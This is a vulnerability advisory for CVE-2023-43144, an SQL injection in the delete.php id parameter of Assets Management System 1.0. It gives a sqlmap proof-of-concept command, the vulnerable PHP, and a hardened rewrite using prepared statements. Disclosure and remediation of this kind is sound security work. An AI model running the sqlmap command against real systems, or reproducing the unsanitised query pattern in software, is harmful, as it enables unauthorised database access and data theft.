Pegasus0xx / CVE-2023-43144

Assets Management System 1.0 is vulnerable to SQL injection via the id parameter in delete.php

CVE-2023-43144

Description

Assets Management System 1.0 is vulnerable to SQL injection via the id parameter in delete.php

PoC

sqlmap -u 'http://localhost/delete.php?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch

Code review (delete.php)

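 <?php include 'core/init.php';

 // User-controlled value read straight from the query string
 $id = $_GET['id'];
 // Passed unchanged to delete_data(), which uses it in the SQL query
 delete_data($con,$id);
 header('location:home.php');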

delete.php performs no validation or sanitization of the $id variable. Any value a user supplies as the id parameter is therefore used directly in the SQL query.
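A hardened version of delete.php, as an added example rather than the project's own code. It assumes $con is a mysqli connection set up by core/init.php; the table name `assets`, the column `id` and the function delete_data_safe() are hypothetical stand-ins, because the body of delete_data() is not shown on this page.

```php
<?php
include 'core/init.php';

/**
 * Hypothetical replacement for delete_data(): deletes one row by primary key
 * using a bound parameter, so the id can never alter the statement text.
 * Assumed names: table `assets`, column `id`.
 */
function delete_data_safe(mysqli $con, int $id): bool
{
    // On PHP 8.1+ mysqli throws mysqli_sql_exception by default; the false
    // checks below cover installations that still use the older silent mode.
    $stmt = $con->prepare('DELETE FROM assets WHERE id = ?');
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('i', $id);   // 'i' = bind as integer
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Accept only a positive decimal integer. filter_input() returns null when
// the parameter is absent and false when it fails validation, so values such
// as "4*", "4 OR 1=1", "" or id[]=4 are all rejected before any query runs.
$id = filter_input(
    INPUT_GET,
    'id',
    FILTER_VALIDATE_INT,
    ['options' => ['min_range' => 1]]
);

if ($id === null || $id === false) {
    http_response_code(400);
    exit('Invalid id');
}

if (!delete_data_safe($con, $id)) {
    http_response_code(500);
    exit('Delete failed');
}

header('Location: home.php');
exit;
```

Input validation and the bound parameter are independent layers: the prepared statement alone closes the injection, and the integer check keeps malformed requests out of the database layer entirely.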
